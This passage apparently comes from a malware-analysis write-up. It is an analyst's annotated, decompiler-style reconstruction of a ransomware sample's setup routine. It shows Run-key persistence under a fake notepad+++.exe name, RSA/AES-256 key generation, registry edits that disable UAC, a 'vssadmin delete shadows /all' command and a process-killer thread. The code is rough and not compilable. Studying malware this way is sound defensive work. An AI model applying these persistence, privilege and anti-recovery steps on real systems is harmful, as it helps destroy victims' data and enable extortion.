int * __cdecl RANSOM__ExecuteAndTakeover(){ /* I've inserted comments rather than discussing this in the main body of the post, as I thought it would be easier to follow this way */ int &Msg, &phkResult, NumberOfBytesWritten, lpString2, &ThreadId, &phKey, &phProv, hProv, &pdwDataLen, lpMultibyteStr; char &cbData[8]; /* not 100% sure if this is what this is */ typedef struct tagWNDCLASSEX { UINT cbSize; UINT style; WNDPROC lpfnWndProc; int cbClsExtra; int cbWndExtra; HINSTANCE hInstance; HICON hIcon; HCURSOR hCursor; HBRUSH hbrBackground; LPCTSTR lpszMenuName; LPCTSTR lpszClassName; HICON hIconSm; } var_30; ncmdshow = dword_404b24 = 0; lpString2 = lpFilename = GlobalAlloc(GMEM_ZEROINIT, 0x8000); /* allocate memory to receive the path to this executable file */ GetModuleFileNameA(0, lpFilename, 0x8000); /* Puts the full path of this file into the newly allocated memory */ if (lstrcmpiA("C:\Windows\notepad+++.exe", lpString2) != 0){ /* if the current path does not match this hardcoded path, then copy the file to the c:\windows\notepad+++.exe location, set it to autorun, * * and also set the actual notepad.exe file to open the ransom note that appears to be dropped in the root directory */ RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, &phkResult); cbData = lstrlenA("c:\\Windows\\notepad.exe \"c:\\How To Restore Files.txt\""); RegSetValueExA(phkResult, "decrypt", 0, REG_SZ, "c:\\Windows\\notepad.exe \"c:\\How To Restore Files.txt\"", cbData); cbData = lstrlenA("c:\\Windows\\notepad+++.exe"); RegSetValueExA(phkResult, "notepad++", 0, REG_SZ, "c:\\Windows\\notepad+++.exe", cbData); RegCloseKey(phkResult); CopyFileA(lpString2, "c:\\Windows\\notepad+++.exe", 0); nCmdShow = 5; } dword_404b24 = 0; /* we already initialized this to 0 before, not sure why we're doing this again */ CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_DELETEKEYSET); /* deletes the current context */ if (CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT) == 0) CryptAcquireContextA(&phProv, 0, "Microsoft Enhanced Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT); /* if we can't get the default context successfully, then use the hardcoded one above */ CryptImportKey(phProv, pbData, 0x114, 0 0, &phKey); /* length is 276 bytes / 2208 bits */ CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_AES, CRYPT_VERIFYCONTEXT); /* AES */ CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, phKey); /* AES 256 */ pdwDataLen = 0x2c; CryptExportKey(phKey, 0, CRYPT_NEWKEYSET, 0, lpString2, &pdwDatalen); /* new key set */ pdwDataLen = 0x2c; /* seems redundant */ CryptEncrypt(phKey, 0, CRYPT_EXPORTABLE, 0, lpString2, &pdwDataLen, CRYPT_SF); /* looks like we're hashing/encrypting the data that was in lpString2, which was the original file path, * * and then this becomes the key as we see later. But does the key blob replace what's already there? */ CryptDestroyKey(phKey); CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_DELETEKEYSET); /* delete the key set */ phProv = CreateFileA("c:\\Windows\DECODE.KEY", GENERIC_READ_WRITE, 0, 0, OPEN_ALWAYS, 0, 0); /* open this file, creates it if it doesn't exist */ SetFilePointer(phProv, 0, 0, FILE_END) /* end of file position */ WriteFile(phProv, lpString2, 0x100, &NumberofBytesWritten, 0); /* write the key into that DECODE.KEY file */ CloseHandle(phProv); /**************************************************************** * Basically at this point, we created a key with RSA/AES256 * * combo, used the original path data as part of this also (I * * think) to generate the key, then wrote it out to this file * * DECODE.KEY. * ****************************************************************/ lpMultiByteStr = lpString2+0x400; GENERIC__Base64(lpString2, lpString2+0x400, 0x100); /* this looks like a generic base64 encoding subroutine using a standard base64 index for files */ RtlMoveMemory(0x40407C, lpMultiByteStr+0x10, 0xa); /* that hex address point to an array containing the ransom note */ MultiByteToWideChar(0x3, 0, lpMultiByteStr, -1, WideCharStr, 0xa); /* convert ransomnote to wide */ RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DateTime\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, &phkResult); cbData = 0xa; if(RegQueryValueExA(phkResult, "notepad++", 0, 0, RansomNoteArray+0x22, &lpcbData) != 0) if(cbData != 0xa) RegSetValueExA(phkResult, "notepad++", 0, REG_SZ, MultiByteStr, 0xa); *MultiByteStr[0xa] = 0; RegSetValueExA(hKey lpMultiByteStr, 0, REG_BINARY, lpString2, 0x100); RegCloseKey(phkResult); RtlZeroMemory(lpString2, 0x8000); /* blow away all this memory */ RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, *phkResult); RegSetValueExA(hKey, "PromptOnSecureDesktop", 0, REG_DWORD, lpString2, 0x4); /* from MSDN: Disabling this policy disables secure desktop prompting. All credential or consent prompting will occur on the interactive user's desktop. */ RegSetValueExA(hKey, "EnableLUA", 0, REG_DWORD, lpString2, 0x4); /* from MSDN: Disabling this policy disables the "administrator in Admin Approval Mode" user type. */ RegSetValueExA(hKey, "ConsentPromptBehaviorAdmin", 0, REG_DWORD, lpString2, 0x4); /* from MSDN: This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials. */ RegCloseKey(hKey); GetEnvironmentVariableA("Comspec", lpString2, 0x5dc); /* get the command line interpreter */ ShellExecuteA(0, 0, lpString2, "/c vssadmin delete shadows /all", 0, 0); /* delete shadow copies, presumably to complicate recovery of files on the system */ GlobalFree(lpString2); SetErrorMode(0x1); CreateThread(0, 0, RANSOM__ProcKiller, 0, 0, &ThreadId); /* This subroutine iterates through running processes and kills non-whitelisted processes */ InitCommonControls(); /* another deprecated function according to MSDN */ var_30.cbSize = 0x30; var_30.style = CS_VREDRAW_AND_HREDRAW; var_30.lpfnWndProc = RANSOM__CallMainFunctionality; /* lots going on here -- need to analyze */ var_30.CbClsExtra = 0; var_30.cbWndExtra = 0x1e; var_30.hInstance = hInstance; var_30.hbrBackground = COLOR_BTNSHADOW; var_30.lpszClassName = "notepad++"; RegisterClassExA(*var_30) CreateDialogParamA(hInstance, 0x65, 0, RANSOM__CallMainFunctionality, 0); ShowWindow(hWnd, nCmdShow); UpdateWindow(hWnd); while ( GetMessageA(&lpMsg, 0, 0, 0) != 0 ){ /* so keep looping unless we get the WM_QUIT message */ TranslateMessage(&Msg); DispatchMessageA(&Msg); } CryptDestroyKey(phKey); return(Msg.wParam); }